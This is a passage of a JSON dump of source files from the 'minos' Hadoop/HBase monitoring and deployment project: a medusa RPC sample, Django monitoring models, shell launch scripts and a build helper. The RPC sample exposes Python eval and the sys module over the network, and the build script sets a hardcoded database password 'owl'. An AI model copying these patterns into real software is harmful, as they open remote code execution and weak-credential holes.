address = ('', 8748)):\n self.create_socket (socket.AF_INET, socket.SOCK_STREAM)\n self.set_reuse_addr()\n self.bind (address)\n self.listen (128)\n self.root = root\n\n def handle_accept (self):\n conn, addr = self.accept()\n fastrpc_channel (self.root, conn, addr)\n\n# ===========================================================================\n\nif __name__ == '__main__':\n\n class thing:\n def __del__ (self):\n print 'a thing has gone away %08x' % id(self)\n\n class sample_calc:\n\n def product (self, *values):\n return reduce (lambda a,b: a*b, values, 1)\n\n def sum (self, *values):\n return reduce (lambda a,b: a+b, values, 0)\n\n def eval (self, string):\n return eval (string)\n\n def make_a_thing (self):\n return thing()\n\n if '-f' in sys.argv:\n server_class = fastrpc_server\n address = ('', 8748)\n else:\n server_class = rpc_server\n address = ('', 8746)\n\n root = rpc_server_root()\n root.calc = sample_calc()\n root.sys = sys\n rs = server_class (root, address)\n asyncore.loop()\n"
},
{
"alpha_fraction": 0.5586206912994385,
"alphanum_fraction": 0.5931034684181213,
"avg_line_length": 23.16666603088379,
"blob_id": "e24847fa16930b5f2302eb6d7499d73436fd567e",
"content_id": "8583dbb166c7403fdceac686350f47a15e13fba7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 290,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 12,
"path": "/tank/backup.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nticket_cache=\".tank_ticket\"\n\nkinit -R -c $ticket_cache\n\nexport KRB5CCNAME=$ticket_cache\n\n./backup.py --hadoop_home=\"./hadoop-2.0.0-mdh1.0.0-SNAPSHOT\" \\\n --cluster=lgprc-xiaomi \\\n --backup_root=/user/h_tank \\\n --tank_home=`pwd` 1>>backup.log 2>&1\n"
},
{
"alpha_fraction": 0.8369565010070801,
"alphanum_fraction": 0.8369565010070801,
"avg_line_length": 22,
"blob_id": "fb8458cdeddac8be4ac0f52920ad6ed2e304e5a7",
"content_id": "2407694ebb056301d7f7c95ba5e9841c8afe9963",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 92,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 4,
"path": "/owl/hbase/admin.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom models import Longhaul\n\nadmin.site.register(Longhaul)\n"
},
{
"alpha_fraction": 0.702658474445343,
"alphanum_fraction": 0.7248125672340393,
"avg_line_length": 38.97275161743164,
"blob_id": "2fdece6263f6ed7f114fd6a7cb84426fb80a2c06",
"content_id": "6d5d60e1fa6bb50b876cee7958c4c186caa6298d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14670,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 367,
"path": "/owl/monitor/models.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.db import models\nfrom django.utils import timezone\n\nimport datetime\nimport json\n\n\nDEFAULT_DATETIME = datetime.datetime(1970, 1, 1, tzinfo=timezone.utc)\n# If a cluster/job/task's last success time has passed this many seconds, it's\n# considered as failed.\nFAIL_TIME = 30\n\n# The item could be cluster, job, or task.\ndef is_healthy(item, fail_time=FAIL_TIME):\n delta = datetime.timedelta(seconds=fail_time)\n if item.last_success_time + delta < datetime.datetime.now(tz=timezone.utc):\n return False\n return True\n\n\nclass Status:\n OK = 0\n WARN = 1\n ERROR = 2\n\n\nclass Service(models.Model):\n # Name of the service, like \"hdfs\", \"hbase\", etc.\n name = models.CharField(max_length=128)\n # Url to get metrics which is formatted in json.\n metric_url = models.CharField(max_length=128)\n # If the service is being actively monitored. We don't want to delete metrics\n # data once a service/cluster/job is deactive, so just use a boolean field to\n # indicate it.\n active = models.BooleanField(default=True)\n # A text description.\n description = models.CharField(max_length=1024)\n\n def __unicode__(self):\n return self.name\n\n\nclass Cluster(models.Model):\n # Each cluster must belong to one service.\n service = models.ForeignKey(Service, db_index=True)\n # The cluster name like \"ggsrv-miliao\", \"sdtst-test\", etc.\n name = models.CharField(max_length=128)\n # The same as service.\n active = models.BooleanField(default=True)\n # A text description.\n description = models.CharField(max_length=1024)\n # The last attempt time to fetch metrics, whether successful or failed.\n # It's the time of client initiating the request, not the time of client\n # receiving the response.\n last_attempt_time = models.DateTimeField(default=DEFAULT_DATETIME)\n # If the last attempt is successful.\n last_status = models.IntegerField(default=Status.ERROR)\n # The status message of last attempt.\n last_message = models.CharField(max_length=128)\n # The last update time of this task's metrics, must be successful.\n # The definition is the same as last_attempt.\n last_success_time = models.DateTimeField(default=DEFAULT_DATETIME)\n # cluster version in format: \"version, revision\"\n version = models.CharField(max_length=128)\n # Entry for service's native main page\n entry = models.CharField(max_length=128)\n\n @property\n def health(self):\n return is_healthy(self)\n\n def __unicode__(self):\n return u\"%s/%s\" % (unicode(self.service), self.name)\n\n\nclass Job(models.Model):\n # Each job must belong to one cluster.\n cluster = models.ForeignKey(Cluster, db_index=True)\n # The job name like \"namenode\", \"regionserver\", etc.\n name = models.CharField(max_length=128)\n # The same as service.\n active = models.BooleanField(default=True)\n # A text description.\n description = models.CharField(max_length=1024)\n # How many tasks are in running and healthy.\n running_tasks_count = models.IntegerField(default=0)\n # How many tasks in total.\n total_tasks_count = models.IntegerField(default=0)\n # The last attempt time to fetch metrics, whether successful or failed.\n # It's the time of client initiating the request, not the time of client\n # receiving the response.\n last_attempt_time = models.DateTimeField(default=DEFAULT_DATETIME)\n # If the last attempt is successful.\n last_status = models.IntegerField(default=Status.ERROR)\n # The status message of last attempt.\n last_message = models.CharField(max_length=128)\n # The last update time of this task's metrics, must be successful.\n # The definition is the same as last_attempt.\n last_success_time = models.DateTimeField(default=DEFAULT_DATETIME)\n\n @property\n def health(self):\n return is_healthy(self)\n\n def __unicode__(self):\n return u\"%s/%s\" % (unicode(self.cluster), self.name)\n\n\nclass Task(models.Model):\n job = models.ForeignKey(Job, db_index=True)\n # The task id.\n task_id = models.IntegerField()\n # The ip or hostname that the task is running on.\n host = models.CharField(max_length=128)\n # The port number where we could get metrics data from.\n port = models.IntegerField()\n # The same as service.\n active = models.BooleanField(default=True)\n # The last attempt time to fetch metrics, whether successful or failed.\n # It's the time of client initiating the request, not the time of client\n # receiving the response.\n last_attempt_time = models.DateTimeField(default=DEFAULT_DATETIME)\n # If the last attempt is successful.\n last_status = models.IntegerField(default=Status.ERROR)\n # The status message of last attempt.\n last_message = models.CharField(max_length=128)\n # The last update time of this task's metrics, must be successful.\n # The definition is the same as last_attempt.\n last_success_time = models.DateTimeField(default=DEFAULT_DATETIME)\n # The last metric values, encoded in json.\n last_metrics = models.TextField()\n # The last raw metric values fetched from http server, for debug purpose\n last_metrics_raw = models.TextField()\n\n class Meta:\n index_together = [[\"host\", \"port\"],]\n\n @property\n def health(self):\n return is_healthy(self)\n\n def __unicode__(self):\n return u\"%s/%d\" % (unicode(self.job), self.task_id)\n\nclass HBaseCluster(models.Model):\n cluster = models.OneToOneField(Cluster, db_index=True)\n\n memStoreSizeMB = models.IntegerField(default = 0)\n storefileSizeMB = models.IntegerField(default = 0)\n # readRequestsCount and writeRequestsCount may exceed max integer\n readRequestsCount = models.FloatField(default = 0, max_length = 20)\n writeRequestsCount = models.FloatField(default = 0, max_length = 20)\n readRequestsCountPerSec = models.FloatField(default = 0, max_length = 20)\n writeRequestsCountPerSec = models.FloatField(default = 0, max_length = 20)\n operationMetrics = models.TextField() # save operation metrics as json format\n\nclass RegionServer(models.Model):\n cluster = models.ForeignKey(Cluster, db_index=True)\n task = models.OneToOneField(Task, db_index=True)\n name = models.CharField(max_length=128)\n last_attempt_time = models.DateTimeField(default=DEFAULT_DATETIME)\n load = models.IntegerField(default = 0)\n numberOfRegions = models.IntegerField(default = 0)\n numberOfRequests = models.IntegerField(default = 0)\n\n memStoreSizeMB = models.IntegerField(default = 0)\n storefileSizeMB = models.IntegerField(default = 0)\n readRequestsCount = models.IntegerField(default = 0)\n writeRequestsCount = models.IntegerField(default = 0)\n readRequestsCountPerSec = models.FloatField(default = 0, max_length = 20)\n writeRequestsCountPerSec = models.FloatField(default = 0, max_length = 20)\n replication_last_attempt_time = models.DateTimeField(default=DEFAULT_DATETIME)\n replicationMetrics = models.TextField() # save replication metrics as json format\n\n def __unicode__(self):\n return unicode(self.name.split(',')[0])\n\nclass Table(models.Model):\n cluster = models.ForeignKey(Cluster, db_index=True)\n name = models.CharField(max_length=128)\n last_attempt_time = models.DateTimeField(default=DEFAULT_DATETIME)\n\n memStoreSizeMB = models.IntegerField(default = 0)\n storefileSizeMB = models.IntegerField(default = 0)\n readRequestsCount = models.IntegerField(default = 0)\n writeRequestsCount = models.IntegerField(default = 0)\n readRequestsCountPerSec = models.FloatField(default = 0, max_length = 20)\n writeRequestsCountPerSec = models.FloatField(default = 0, max_length = 20)\n\n availability = models.FloatField(default=-1.0)\n operationMetrics = models.TextField() # save operation metrics as json format\n\n rows = models.IntegerField(default = -1)\n is_count_rows = models.BooleanField(default=False)\n last_update_time = models.DateTimeField(default=DEFAULT_DATETIME)\n \n def __unicode__(self):\n return unicode(self.name)\n\nROOT_TABLE_NAME = '-ROOT-'\nMETA_TABLE_NAME = '.META.'\nROOT_REGION_ENCODING_NAME = '70236052'\nMETA_REGION_ENCODING_NAME = '1028785192'\n\nclass Region(models.Model):\n table = models.ForeignKey(Table, db_index=True)\n region_server = models.ForeignKey(RegionServer, db_index=True)\n last_attempt_time = models.DateTimeField(default=DEFAULT_DATETIME)\n name = models.CharField(max_length=256)\n encodeName = models.CharField(max_length = 128, db_index=True)\n\n memStoreSizeMB = models.IntegerField(default = 0)\n storefileSizeMB = models.IntegerField(default = 0)\n readRequestsCount = models.IntegerField(default = 0)\n writeRequestsCount = models.IntegerField(default = 0)\n readRequestsCountPerSec = models.FloatField(default = 0, max_length = 20)\n writeRequestsCountPerSec = models.FloatField(default = 0, max_length = 20)\n\n currentCompactedKVs = models.IntegerField(default = 0)\n requestsCount = models.IntegerField(default = 0)\n rootIndexSizeKB = models.IntegerField(default = 0)\n storefileIndexSizeMB = models.IntegerField(default = 0)\n storefiles = models.IntegerField(default = 0)\n stores = models.IntegerField(default = 0)\n totalCompactingKVs = models.IntegerField(default = 0)\n totalStaticBloomSizeKB = models.IntegerField(default = 0)\n totalStaticIndexSizeKB = models.IntegerField(default = 0)\n version = models.IntegerField(default = 0)\n last_operation_attempt_time = models.DateTimeField(default=DEFAULT_DATETIME)\n operationMetrics = models.TextField() # save operation metrics as json format\n\n # root and meta region use old region format, where root regon name is: '-ROOT-,,0.70236052'\n # and first meta region name is: .META.,,1.1028785192. 70236052 and 1028785192 will serve as\n # encode name for root region and meta region respectively. Other data region use new format,\n # such as hbase_client_test_table,01,1369368306964.7be6b8bda3e59d5e6d4556482fc84601. in which\n # 7be6b8bda3e59d5e6d4556482fc84601 will serve as encode name\n @staticmethod\n def get_encode_name(name):\n if name[0:6] == ROOT_TABLE_NAME:\n return ROOT_REGION_ENCODING_NAME\n if name[0:6] == META_TABLE_NAME:\n return META_REGION_ENCODING_NAME\n return name.split('.')[1]\n\n # the region operation metric name(AvgTime) for 'multiput' seems like:\n # tbl.hbase_client_test_table.region.9fdec6d4dbb175e2b098e16fc5987dcb.multiput_AvgTime where\n # 9fdec6d4dbb175e2b098e16fc5987dcb is the encode name\n @staticmethod\n def is_region_operation_metric_name(name):\n if name.find('tbl') >= 0 and name.find('region') >= 0:\n return True\n return False\n\n def get_region_id(self):\n region_id = \"\"\n try:\n element_list = self.name.split(',')\n region_id = element_list[-1].split('.')[1]\n except Exception as e:\n print \"%s failed to get region id.\" % (self.name)\n return region_id\n\n @staticmethod\n def get_encode_name_from_region_operation_metric_name(name):\n tokens = name.split('.')\n return tokens[len(tokens) - 2]\n\n def analyze_region_record(self, region_value, update_time):\n time_interval = (update_time - self.last_attempt_time).seconds\n self.readRequestsCountPerSec = \\\n (float)(region_value['readRequestsCount'] - self.readRequestsCount)\\\n / time_interval\n if self.readRequestsCountPerSec < 0:\n self.readRequestsCountPerSec = 0\n self.writeRequestsCountPerSec = \\\n (float)(region_value['writeRequestsCount'] - self.writeRequestsCount)\\\n / time_interval\n if self.writeRequestsCountPerSec < 0:\n self.writeRequestsCountPerSec = 0\n self.last_attempt_time = update_time\n self.memStoreSizeMB = region_value['memStoreSizeMB']\n self.storefileSizeMB = region_value['storefileSizeMB']\n self.readRequestsCount = region_value['readRequestsCount']\n self.writeRequestsCount = region_value['writeRequestsCount']\n self.requestsCount = region_value['requestsCount']\n\n # operation metric from jmx is formatted as: 'tbl.tableName.region.encodeName.operationName_Suffix : value'\n # where Suffix could be OpsNum, AvgTime, MaxTime, MinTime, histogram_75percentile, histogram_95percentile etc.\n # We save all operation metrics as the a map: {operationName : {{OpsNum : value}, {AvgTime, value}, ...}}.\n # Then, the map will be converted to a json format and into self.operationMetrics\n def analyze_from_region_server_operation_metrics(self, region_operation_metrics, update_time):\n self.last_operation_attempt_time = update_time\n metric_saved = {}\n for region_operation in region_operation_metrics.keys():\n tokens = region_operation.split('.')\n tokens = tokens[len(tokens) - 1].split('_')\n tokens_len = len(tokens)\n\n index = 0\n while index < tokens_len:\n if tokens[index] == 'histogram':\n break;\n index = index + 1\n\n operationName = ''\n suffix = ''\n if index < tokens_len:\n # for histogram metics\n operationName = '_'.join(tokens[0 : index])\n suffix = '_'.join(tokens[index : tokens_len])\n else:\n operationName = '_'.join(tokens[0 : tokens_len - 1])\n suffix = tokens[tokens_len - 1]\n\n operationMetric = metric_saved.setdefault(operationName, {})\n operationMetric[suffix] = region_operation_metrics[region_operation]\n self.operationMetrics = json.dumps(metric_saved)\n\n def __unicode__(self):\n return unicode(self.name)\n\n def __str__(self):\n return repr(','.join((self.name.split(',')[:2]))).replace(\"'\", '')\n\nclass Counter(models.Model):\n # The from ip of the counter\n host = models.CharField(max_length=16)\n # The group name of the counter\n group = models.CharField(max_length=64)\n name = models.CharField(max_length=128)\n\n # The last update time of the counter\n last_update_time = models.DateTimeField(default=DEFAULT_DATETIME)\n\n value = models.FloatField(default=0)\n # The unit of the value, reqs/s, ms, ...\n unit = models.CharField(max_length=16)\n # The label of the counter, used to display in corresponding section of html page\n label = models.CharField(max_length=64)\n\n def identity(self):\n return u\"%s-%s\" % (self.group, self.name)\n\n class Meta:\n unique_together = (\"group\", \"name\")\n\n def __unicode__(self):\n return u\"%s/%s/%s/%s\" % (self.host, self.group, self.name, self.last_update_time)\n\nclass Quota(models.Model):\n cluster = models.ForeignKey(Cluster, db_index=True)\n name = models.CharField(max_length=256)\n quota = models.CharField(max_length=16)\n used_quota = models.CharField(max_length=16)\n remaining_quota = models.CharField(max_length=16)\n space_quota = models.CharField(max_length=16)\n used_space_quota = models.CharField(max_length=16)\n remaining_space_quota = models.CharField(max_length=16)\n\n last_update_time = models.DateTimeField(default=DEFAULT_DATETIME)\n\n class Meta:\n unique_together = (\"cluster\", \"name\")\n\n def __unicode__(self):\n return u\"%s/%s:%s\" % (unicode(self.cluster), self.name,self.last_update_time)\n"
},
{
"alpha_fraction": 0.6315789222717285,
"alphanum_fraction": 0.6616541147232056,
"avg_line_length": 21.16666603088379,
"blob_id": "8e38187ecbb3a2b8169fdc46a8f7a3c0c6125ee5",
"content_id": "34e693e784be69ed0a213370d05c4a08c1c5d0b4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 133,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 6,
"path": "/owl/collector.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nsource \"$(dirname $0)\"/../build/minos_env.sh || exit 1\ncd $OWL_ROOT\n\n$ENV_PYTHON manage.py collect > collector.log 2>&1\n"
},
{
"alpha_fraction": 0.5124617218971252,
"alphanum_fraction": 0.529077410697937,
"avg_line_length": 28.320512771606445,
"blob_id": "7067de012fda626e85acc75c07c9192b7bb0cc21",
"content_id": "acffcf53619e26669504e49deff51b0379e2f5fb",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2287,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 78,
"path": "/supervisor/supervisor/medusa/unix_user_handler.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n#\n# Author: Sam Rushing <[email protected]>\n# Copyright 1996, 1997 by Sam Rushing\n# All Rights Reserved.\n#\n\nRCS_ID = '$Id: unix_user_handler.py,v 1.4 2002/11/25 00:09:23 akuchling Exp $'\n\n# support for `~user/public_html'.\n\nimport re\nimport string\nimport default_handler\nimport filesys\nimport os\nimport pwd\n\nget_header = default_handler.get_header\n\nuser_dir = re.compile ('/~([^/]+)(.*)')\n\nclass unix_user_handler (default_handler.default_handler):\n\n def __init__ (self, public_html = 'public_html'):\n self.public_html = public_html\n default_handler.default_handler.__init__ (self, None)\n\n # cache userdir-filesystem objects\n fs_cache = {}\n\n def match (self, request):\n m = user_dir.match (request.uri)\n return m and (m.end() == len (request.uri))\n\n def handle_request (self, request):\n # get the user name\n m = user_dir.match (request.uri)\n user = m.group(1)\n rest = m.group(2)\n\n # special hack to catch those lazy URL typers\n if not rest:\n request['Location'] = '/~%s/' % user\n request.error (301)\n return\n\n # have we already built a userdir fs for this user?\n if self.fs_cache.has_key (user):\n fs = self.fs_cache[user]\n else:\n # no, well then, let's build one.\n # first, find out where the user directory is\n try:\n info = pwd.getpwnam (user)\n except KeyError:\n request.error (404)\n return\n ud = info[5] + '/' + self.public_html\n if os.path.isdir (ud):\n fs = filesys.os_filesystem (ud)\n self.fs_cache[user] = fs\n else:\n request.error (404)\n return\n\n # fake out default_handler\n self.filesystem = fs\n # massage the request URI\n request.uri = '/' + rest\n return default_handler.default_handler.handle_request (self, request)\n\n def __repr__ (self):\n return '<Unix User Directory Handler at %08x [~user/%s, %d filesystems loaded]>' % (\n id(self),\n self.public_html,\n len(self.fs_cache)\n )\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6984127163887024,
"avg_line_length": 20,
"blob_id": "fdc668ccbb53fa7917be7a9850394abdaa7eaf13",
"content_id": "5d57a747680d3b565a11f2391307d7c3cd135fcb",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 63,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 3,
"path": "/owl/start_count_rows.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\npython manage.py count_rows > count_rows.log 2>&1\n"
},
{
"alpha_fraction": 0.6606606841087341,
"alphanum_fraction": 0.6606606841087341,
"avg_line_length": 24.615385055541992,
"blob_id": "74c9f73f00d7360146dda298986691f7d37e4b03",
"content_id": "b722fa9598667b44da57e927e9d0dc19444b09fe",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 333,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 13,
"path": "/owl/machine/admin.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom models import Machine\n\n\nclass MachineAdmin(admin.ModelAdmin):\n list_display = ('hostname', 'ip', 'idc', 'rack', 'cores', 'ram',\n 'disks', 'disk_capacity', 'ssds', 'ssd_capacity', )\n list_filter = ('idc', 'rack', )\n ordering = ('hostname', )\n\n\nadmin.site.register(Machine, MachineAdmin)\n"
},
{
"alpha_fraction": 0.622710645198822,
"alphanum_fraction": 0.6358974575996399,
"avg_line_length": 22.13559341430664,
"blob_id": "8ad7ab84a832a4fa6eb75a8b155681009c0335de",
"content_id": "e0ef37637bc67f085cafd7d9d76920ac336b4e5f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1365,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 59,
"path": "/config/template/start.sh.tmpl",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\nexport LC_ALL=\"en_US.UTF-8\"\nartifact=\"%artifact\"\njob_name=\"%job_name\"\nrun_dir=\"%run_dir\"\n\nrun_dir=`cd \"$run_dir\"; pwd`\n\nstart_time=`date +%%Y%%m%%d-%%H%%M%%S`\n\npid=`echo $$`\n\npackage_dir=\"$run_dir/package\"\nlog_dir=\"$run_dir/log\"\npid_file=\"$run_dir/${job_name}.pid\"\n\nif [[ ! -d $run_dir/stdout ]]; then \n mkdir $run_dir/stdout\nfi\n\noutput_file=\"$run_dir/stdout/${job_name}_${start_time}.out\"\n\njar_dirs=\"%jar_dirs\"\nparams=\"%params\"\n\njava=\"/opt/soft/jdk/bin/java\"\nif ! [ -e $java ]; then\n java=\"/usr/bin/java\"\nfi\n\nclass_path=\"$run_dir/:$jar_dirs\"\n\nif [ -f $pid_file ]; then\n if kill -0 `cat $pid_file` > /dev/null 2>&1; then\n echo -e \"\\033[33mThe $job_name is running, skipped.\\033[0m\"\n exit 0\n else\n rm -f \"$pid_file\" || exit 1\n fi\nfi\n\noptions=\"\"\nif [ -d \"$package_dir/lib/native\" ]; then\n JAVA_PLATFORM=\"\"\n if [ -z $JAVA_PLATFORM ]; then\n JAVA_PLATFORM=`CLASSPATH=${class_path} ${java} org.apache.hadoop.util.PlatformName | sed -e \"s/ /_/g\"`\n fi\n\n JAVA_LIBRARY_PATH=\"$JAVA_LIBRARY_PATH:$package_dir/lib/native/:$package_dir/lib/native/${JAVA_PLATFORM}\"\n\n export LD_LIBRARY_PATH=\"$LD_LIBRARY_PATH:$JAVA_LIBRARY_PATH\"\n options=\"$OPTS -Djava.library.path=$JAVA_LIBRARY_PATH\"\nfi\n\n%service_env\nif [ -f ./pre.sh ]; then\n source ./pre.sh $job_name $run_dir\nfi\nexec ${java} -cp $class_path $options $params $@ 1>$output_file 2>&1\n"
},
{
"alpha_fraction": 0.4935064911842346,
"alphanum_fraction": 0.4935064911842346,
"avg_line_length": 32.297298431396484,
"blob_id": "acc9843ea1c6e4608441376e236e45a5360061d5",
"content_id": "3d572c7ba7b82e8be8f86c1289ccd085f7d564f9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1232,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 37,
"path": "/config/owl/business_view_config.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "BUSINESS_METRICS_VIEW_CONFIG = {\n 'Write HBase' : [['write operation', 'Write/HBase'],\n ['log length', 'Write/Log'],\n ['memory/thread', 'Write/MemoryThread'],\n ],\n 'Read HBase' : [['read operation', 'Read/HBase'],\n ['result size', 'Read/ResultSize'],\n ['memory/thread', 'Read/MemoryThread'],\n ],\n}\n\nONLINE_METRICS_MENU_CONFIG = {\n 'Online Write' : [['Qps', 'Write/Qps'],\n ['HBase Latency', 'Write/HBase Latency'],\n ['Total Latency', 'Write/Total Latency'],\n ['WriteFail', 'Write/WriteFail'],\n ['HTablePool', 'Write/HTablePool'],\n ['Replication', 'Write/Replication'],\n ['Exception', 'Write/Exception'],\n ],\n 'Online Read' : [['Qps', 'Read/Qps'],\n ['HBase Latency', 'Read/HBase Latency'],\n ['Total Latency', 'Read/Total Latency'],\n ['ReadFail', 'Read/ReadFail'],\n ['HTablePool', 'Read/HTablePool'],\n ['Exception', 'Read/Exception'],\n ],\n}\n\nONLINE_METRICS_COUNTER_CONFIG = {\n}\n\nONLINE_METRICS_TITLE_CONFIG = {\n}\n\nONLINE_METRICS_ENDPOINT_CONFIG = {\n}\n"
},
{
"alpha_fraction": 0.7064584493637085,
"alphanum_fraction": 0.7078701257705688,
"avg_line_length": 34.19565200805664,
"blob_id": "22146f4259f1340ef674658c76d9d32b7c0f35a8",
"content_id": "a71912d4ec99e837b8558c9a2ec96c35d5358ec6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11334,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 322,
"path": "/build/build_owl.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import getpass\nimport os\nimport subprocess\nimport warnings\n\nimport build_utils\nfrom build_utils import MINOS_ROOT\n\nfrom minos_config import HBASE_CONFIG_FILE\nfrom minos_config import HBASE_CONFIG_ROOT\nfrom minos_config import HBASE_ROOT\nfrom minos_config import HBASE_TARBALL\nfrom minos_config import Log\nfrom minos_config import OPENTSDB_COLLECTOR_CONFIG_FILE\nfrom minos_config import OPENTSDB_CONFIG_ROOT\nfrom minos_config import OPENTSDB_PORT\nfrom minos_config import OPENTSDB_REPOSITORY\nfrom minos_config import OWL_CONFIG_FILE\nfrom minos_config import OWL_PREREQUISITE_PYTHON_LIBS\n\nBUILD_BIN_ROOT = os.getenv(\"BUILD_BIN_ROOT\")\nBUILD_DOWNLOAD_ROOT = os.getenv(\"BUILD_DOWNLOAD_ROOT\")\nENV_PYTHON = os.getenv(\"ENV_PYTHON\")\nHBASE_CONFIG_TEMPLATE = os.getenv(\"HBASE_CONFIG_TEMPLATE\")\nHBASE_PID_FILE = os.getenv(\"HBASE_PID_FILE\")\nOPENTSDB_BIN_PATH = os.getenv(\"OPENTSDB_BIN_PATH\")\nOPENTSDB_COLLECTOR_CONFIG_TEMPLATE = os.getenv(\"OPENTSDB_COLLECTOR_CONFIG_TEMPLATE\")\nOPENTSDB_COLLECTOR_PID_FILE = os.getenv(\"OPENTSDB_COLLECTOR_PID_FILE\")\nOPENTSDB_COLLECTOR_ROOT = os.getenv(\"OPENTSDB_COLLECTOR_ROOT\")\nOPENTSDB_PID_FILE = os.getenv(\"OPENTSDB_PID_FILE\")\nOPENTSDB_ROOT = os.getenv(\"OPENTSDB_ROOT\")\nOWL_COLLECTOR_PID_FILE = os.getenv(\"OWL_COLLECTOR_PID_FILE\")\nOWL_CONFIG_TEMPLATE = os.getenv(\"OWL_CONFIG_TEMPLATE\")\nOWL_MONITOR_PID_FILE = os.getenv(\"OWL_MONITOR_PID_FILE\")\nOWL_ROOT = os.getenv(\"OWL_ROOT\")\nOWL_SETTING_FILE = os.getenv(\"OWL_SETTING_FILE\")\nOWL_SETTING_TEMPLATE = os.getenv(\"OWL_SETTING_TEMPLATE\")\nQUOTA_UPDATER_PID_FILE = os.getenv(\"QUOTA_UPDATER_PID_FILE\")\nSTOP_PROCESS_SCRIPT = os.getenv(\"STOP_PROCESS_SCRIPT\")\n\n# Check third-party tool exists\ndef check_third_party_tool_exists(tool_name):\n cmd = \"which %s\" % tool_name\n error_message = \"Please install %s firstly\" % tool_name\n build_utils.check_command_output(cmd, error_message=error_message)\n\ndef create_owl_database(args, database_name, host=\"\", port=\"\"):\n root_pwd = getpass.getpass(\"Please enter password of the Mysql root user: \")\n\n # Create owl\n import MySQLdb as db\n try:\n if host and port:\n conn = db.connect(host=host, user='root', passwd=root_pwd, port=int(port))\n else:\n conn = db.connect(user='root', passwd=root_pwd)\n except db.Error, e:\n Log.print_critical(\"ERROR: %s\" % str(e))\n\n cursor = conn.cursor()\n warnings.filterwarnings('ignore', \"Can't create .*\")\n cursor.execute(\"create database if not exists %s;\" % database_name)\n cursor.execute(\"use mysql;\")\n cursor.execute(\"GRANT ALL ON %s.* TO 'owl'@'localhost' identified by 'owl';\"\n % database_name)\n cursor.execute(\"GRANT ALL ON %s.* TO 'owl'@'%s' identified by 'owl';\"\n % (database_name, args.owl_ip))\n cursor.execute(\"flush privileges;\")\n\n cursor.close()\n conn.close()\n\ndef configure_mysql_for_owl(database_name, host='localhost', port='3306'):\n Log.print_info(\"Configuring mysql for owl in %s\" % OWL_SETTING_FILE)\n owl_setting_dict = {\n 'DATABASE': database_name,\n 'HOST': host,\n 'PORT': port,\n }\n build_utils.generate_config_file(OWL_SETTING_TEMPLATE,\n OWL_SETTING_FILE, owl_setting_dict)\n\ndef create_and_configure_mysql_for_owl(args):\n if build_utils.get_build_info_option('owl', 'mysql') == 'created':\n return\n # Support both local and remote database\n choice = raw_input(\"Please choose Mysql server you want to use \" \\\n \"(1 for Local, 2 for Remote): \")\n owl_prefix = raw_input(\"Please enter the prefix of your owl database name \" \\\n \"(default: %s): \" % getpass.getuser())\n if not owl_prefix:\n owl_prefix = getpass.getuser()\n database_name = \"%s_owl\" % owl_prefix\n\n # Using local mysql\n if int(choice) == 1:\n # Check mysql server is running\n cmd = 'ps -ef | grep mysqld | grep -v grep'\n error_message = \"Please start mysql server firstly\"\n build_utils.check_command_output(cmd, error_message=error_message)\n # Create owl database\n create_owl_database(args, database_name)\n # Configure mysql for owl\n configure_mysql_for_owl(database_name)\n\n # Using remote mysql\n elif int(choice) == 2:\n remote_address = raw_input(\"Please input the remote mysql \" \\\n \"server's address (ip:port): \")\n remote_host, remote_port = remote_address.split(\":\")\n # Create owl database\n create_owl_database(args, database_name, host=remote_host, port=remote_port)\n # Configure mysql for owl\n configure_mysql_for_owl(database_name, remote_host, remote_port)\n else:\n Log.print_critical(\"ERROR: invalid choice\")\n\n # Mark mysql database created\n build_utils.output_build_info('owl', 'mysql', 'created')\n\ndef create_django_database():\n django_entry = os.path.join(OWL_ROOT, 'manage.py')\n cmd = [ENV_PYTHON, \"%s\" % django_entry, \"syncdb\"]\n build_utils.execute_command(cmd)\n\ndef deploy_opentsdb():\n if not os.path.exists(OPENTSDB_ROOT):\n log_message = \"Checkout opentsdb in %s\" 